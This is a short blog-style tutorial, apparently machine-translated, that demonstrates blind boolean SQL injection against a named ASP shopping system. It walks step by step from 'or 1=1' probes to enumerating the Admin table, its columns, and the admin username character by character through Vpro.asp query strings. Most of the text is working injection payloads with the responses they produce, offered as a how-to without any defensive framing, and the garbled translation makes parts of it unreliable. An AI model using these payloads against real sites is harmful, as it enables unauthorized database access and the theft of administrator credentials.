I haven't written it for a long time
Recently, I am in a bad mood.
Send an article to ease your mood ....
Recently, the Security Detection on the space-time and space-time literature site is very interesting.
It is worth learning and researching.
I thought about network security for a long time.
Or 1 = 1 Script Injection Technology
We use the thunder Shopping System for or injection demonstration. We first use or 1 = 1 and or 1 = 2 to test whether there are injection points. Let's first look at the normal page. We now use or 1 = 1 to test whether the injection vulnerability exists. Another page is returned. Let's test or 1 = 2. The returned page is a normal page, indicating that an error occurs when the guess is correct and that the guess is normal when the guess is wrong. This is the true "false is true or false ", it's more classic than lake2's IP spoofing.
Let's construct the test statement:
Vpro. asp? Id = 1 or exists (select * from Admin)
The error page is returned, indicating that the admin table exists. Let's try another table!
Vpro. asp? Id = 1 or exists (select * From n0h4ck)
The table n0h4ck does not exist.
Let's continue and construct the statement.
Vpro. asp? Id = 1 or exists (Select Admin from Admin)
The OR 1 = 1 page is returned, indicating that the admin table has the admin field.
Vpro. asp? Id = 1 or exists (select padd from Admin)
The OR 1 = 2 page is returned, indicating that the padd field does not exist in the admin table.
Now we start to guess the data,
Vpro. asp? Id = 1 or (select mid (Admin, 1, 1) from Admin) = 'n'
The OR 1 = 2 page is returned, indicating that the first character of the first data in the admin field of the Admin table is not "N ".
Let's try again
Vpro. asp? Id = 1 or (select mid (Admin, 1, 1) from Admin) = 'A'
Return the page with or 1 = 1, indicating that the first character of the first data in the admin field of the Admin table is "A". What do we think of first data? Of course it is "admin.
Let's use the left function to determine,
Vpro. asp? Id = 1 or (select left (Admin, 5) from Admin) = 'admin'
The guess is correct. It is indeed Admin. Okay, I don't need to talk about it later.